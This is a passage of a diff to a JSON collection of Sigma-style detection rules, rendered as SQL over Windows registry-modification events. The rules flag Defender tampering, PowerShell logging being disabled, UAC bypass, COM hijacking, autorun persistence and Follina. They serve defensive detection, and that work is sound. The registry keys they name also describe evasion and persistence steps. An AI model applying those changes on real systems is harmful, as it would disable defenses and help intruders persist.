'%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAHealth' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCANetwork' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAPower' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAVolume' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowInfoTip' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowCompColor' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" ], - "filename": "registry_set_wab_dllpath_reg_change.yml" + "filename": "registry_set_hide_function_user.yml" }, { - "title": "Service Binary in Uncommon Folder", - "id": "277dc340-0540-42e7-8efb-5ff460045e07", + "title": "Disable Internal Tools or Feature in Registry", + "id": "e2482f8d-3443-4237-b906-cc145d87a076", "status": "experimental", - "description": "Detect the creation of a service with a service binary located in a uncommon directory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate admin script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\DisableCMD' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableTaskmgr' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Explorer\\\\DisableNotificationCenter' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableChangePassword' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableLockWorkstation' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\StartMenuLogOff' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\shutdownwithoutlogon' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PushNotifications\\\\ToastEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Storage\\\\Write Protection' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\StorageDevicePolicies\\\\WriteProtect' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" ], - "filename": "registry_set_creation_service_uncommon_folder.yml" + "filename": "registry_set_disable_function_user.yml" }, { - "title": "Add Debugger Entry To Hangs Key For Persistence", - "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "title": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)", + "id": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", + "status": "test", + "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", + "author": "Sittikorn S", + "tags": [ + "attack.defense_evasion", + "attack.t1221" + ], + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKCR\\\\ms-msdt\\\\%' ESCAPE '\\')" + ], + "filename": "registry_set_cve_2022_30190_msdt_follina.yml" + }, + { + "title": "Potential Persistence Via CHM Helper DLL", + "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", "status": "experimental", - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence" ], "falsepositives": [ - "This value is not set by default but could be rarly used by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" ], - "filename": "registry_set_hangs_debugger_persistence.yml" + "filename": "registry_set_persistence_chm.yml" }, { "title": "New DNS ServerLevelPluginDll Installed", @@ -33355,190 +33108,186 @@ "filename": "registry_set_dns_server_level_plugin_dll.yml" }, { - "title": "Hiding User Account Via SpecialAccounts Registry Key", - "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", - "status": "test", - "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "title": "Common Autorun Keys Modification", + "id": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", "tags": [ - "attack.defense_evasion", - "attack.t1564.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows CE Services\\\\AutoStart%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\Setup\\\\CmdLine%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Ctf\\\\LangBarAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Handler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Htmlfile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Environment\\\\UserInitMprLogonScript%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\UrlSearchHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Desktop\\\\Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Classes\\\\Clsid\\\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\\\Inprocserver32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRunStore\\\\HKMU\\\\SOFTWARE\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\') OR NewValue IN ('{314111c7-a502-11d2-bbca-00c04f8ec294}', '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}', '{42089D2D-912D-4018-9087-2B87803E93FB}', '{5504BE45-A83B-4808-900A-3A5C36E7F77A}', '{807583E5-5146-11D5-A672-00B0D022E945}')) OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{8A69D345-D564-463c-AFF1-A69D9E530F96}%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{89820200-ECBD-11cf-8B85-00AA005B4383}%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" ], - "filename": "registry_set_special_accounts.yml" + "filename": "registry_set_asep_reg_keys_modification_common.yml" }, { - "title": "ETW Logging Disabled For rpcrt4.dll", - "id": "90f342e1-1aaa-4e43-b092-39fda57ed11e", + "title": "Potential Persistence Via COM Search Order Hijacking", + "id": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", "status": "experimental", - "description": "Detects changes to the \"ExtErrorInformation\" key in order to disable ETW logging for rpcrt4.dll", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential COM object hijacking leveraging the COM Search Order", + "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unknown" + "Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\Rpc\\\\ExtErrorInformation' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000002)'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\') AND NOT (((NewValue LIKE '%\\%\\%systemroot\\%\\%\\\\system32\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%\\%systemroot\\%\\%\\\\SysWow64\\\\%' ESCAPE '\\')) OR ((NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\FileCoAuthLib64.dll%' ESCAPE '\\' OR NewValue LIKE '%\\\\FileSyncShell64.dll%' ESCAPE '\\' OR NewValue LIKE '%\\\\FileSyncApi64.dll%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\TeamsMeetingAddin\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\Microsoft.Teams.AddinLoader.dll%' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Roaming\\\\Dropbox\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\DropboxExt64.%.dll%' ESCAPE '\\') OR (NewValue LIKE '%TmopIEPlg.dll' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewValue LIKE '%\\\\FileRepository\\\\nvmdi.inf%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\MicrosoftEdgeUpdateComRegisterShell64.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\SYSTEM32\\\\dxdiag.exe' ESCAPE '\\') OR ((NewValue LIKE 'C:\\\\Windows\\\\pyshellext.amd64.dll' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\pyshellext.dll' ESCAPE '\\')) OR ((NewValue LIKE 'C:\\\\Windows\\\\system32\\\\dnssdX.dll' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\SysWOW64\\\\dnssdX.dll' ESCAPE '\\')) OR (NewValue LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR ((NewValue LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewValue LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\%' ESCAPE '\\') OR (NewValue LIKE '%C:\\\\WINDOWS\\\\system32\\\\GamingServicesProxy.dll%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND NewValue LIKE '%C:\\\\Windows\\\\System32\\\\Autopilot.dll%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\' AND NewValue LIKE '%C:\\\\Windows\\\\System32\\\\SecurityHealth%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\InProcServer32\\\\(Default)' ESCAPE '\\')))" ], - "filename": "registry_set_rpcrt4_etw_tamper.yml" + "filename": "registry_set_persistence_search_order.yml" }, { - "title": "Disable Windows Defender Functionalities Via Registry Keys", - "id": "0eb46774-f1ab-4a74-8238-1155855f2263", + "title": "ScreenSaver Registry Key Set", + "id": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", "status": "experimental", - "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", - "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", + "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.011" ], "falsepositives": [ - "Administrator actions" + "Legitimate use of screen saver" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE%' ESCAPE '\\' AND NewValue LIKE '%.scr' ESCAPE '\\') AND NOT ((NewValue LIKE '%C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_windows_defender_tamper.yml" + "filename": "registry_set_scr_file_executed_by_rundll32.yml" }, { - "title": "PowerShell as a Service in Registry", - "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", - "status": "test", - "description": "Detects that a powershell code is written to the registry as a service.", - "author": "oscd.community, Natalia Shornikova", + "title": "PowerShell Logging Disabled Via Registry Key Tampering", + "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", + "status": "experimental", + "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "registry_set_powershell_as_service.yml" + "filename": "registry_set_powershell_logging_disabled.yml" }, { - "title": "Outlook Macro Execution Without Warning Setting Enabled", - "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", - "status": "test", - "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", - "author": "@ScoubiMtl", + "title": "Allow RDP Remote Assistance Feature", + "id": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", + "status": "experimental", + "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the feature (alerts should be investigated either way)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\fAllowToGetHelp' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "registry_set_office_outlook_enable_macro_execution.yml" + "filename": "registry_set_allow_rdp_remote_assistance_feature.yml" }, { - "title": "Bypass UAC Using DelegateExecute", - "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", - "status": "test", - "description": "Bypasses User Account Control using a fileless method", + "title": "Potential Persistence Using DebugPath", + "id": "df4dc653-1029-47ba-8231-3c44238cc0ae", + "status": "experimental", + "description": "Detects potential persistence using Appx DebugPath", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND NewValue = '(Empty)')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ActivatableClasses\\\\Package\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\DebugPath' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PackagedAppXDebug\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\')))" ], - "filename": "registry_set_bypass_uac_using_delegateexecute.yml" + "filename": "registry_set_persistence_appx_debugger.yml" }, { - "title": "CurrentVersion NT Autorun Keys Modification", - "id": "cbf93e5d-ca6c-4722-8bea-e9119007c248", + "title": "Potential Persistence Via Outlook Today Pages", + "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547.001" + "attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\VmApplet%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Taskman%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GpExtensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AppSetup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AlternateShells\\\\AvailableShells%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\IconServiceLib%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Font Drivers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Load%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE 